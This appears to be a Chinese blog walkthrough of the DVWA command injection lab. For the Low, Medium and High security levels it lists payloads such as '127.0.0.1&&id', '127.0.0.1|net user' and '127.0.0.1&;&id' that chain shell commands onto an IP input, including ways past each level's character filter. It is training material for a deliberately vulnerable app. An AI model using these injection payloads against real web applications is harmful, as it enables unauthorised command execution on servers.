DVWA------命令注入

简介

  • 命令注入是通过在应用程序中注入和执行宿主操作系统的命令,来达到破坏目的的一种攻击方式,由应用程序传递操作系统命令会赋有和应用一样的权限。
  • 命令注入攻击漏洞是PHP应用程序中常见的漏洞之一。
  • 命令注入和代码注入不同,代码注入的目的在于将外部代码注入应用程序本身,并随程序执行;命令攻击的对象是服务器的宿主机。

工具

  • firefox浏览器

测试方法

Low等级

  • 将DVWA安全等级调为Low等级
  • Low等级对输入并没有进行任何的过滤。
  • 在输入框正常输入IP地址,返回结果如图
    在这里插入图片描述
  • 由于在windows cmd和linux shell条件下,都可以通过&&来串行执行命令。
  • 我们附上dir命令,输入127.0.0.1&&dir执行后:
    在这里插入图片描述
  • 命令执行后,不但执行了前面的ping IP地址,还执行了后面dir命令,回显出了结果。
  • 输入127.0.0.1&&id命令:
    127.0.0.1&id
  • 链接: &&、&、|、||命令拼接符号含义.
  • 自己可以试试这些命令分析回显,这里就不多介绍了:
    127.0.0.1&&id
    127.0.0.1&&net user
    testcmdinjection||id
    testcmdinjection||net user
    127.0.0.1&id
    127.0.0.1|net user
    testcmdinjection&id
    testcmdinjection|net user

Medium等级

  • 将DVWA安全等级调为 Medium等级
  • Medium等级针对输入数据删除&&和;
  • 根据Low等级的方法直接输入命令分析回显即可:
    127.0.0.1&;&id
    127.0.0.1&;&net user
    testcmdinjection||id
    testcmdinjection||net user
    127.0.0.1&id
    127.0.0.1|net user
    testcmdinjection&id
    testcmdinjection|net user

High等级

  • 将DVWA安全等级调为 High等级
  • High等级针对输入数据删除&、;、-、$、(、)、`、||、|空格等字符(|空格有过滤,但对|并不进行处理)
  • 根据Low等级的方法直接输入命令分析回显即可:
    127.0.0.1|id
    testcmdinjection|net user
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值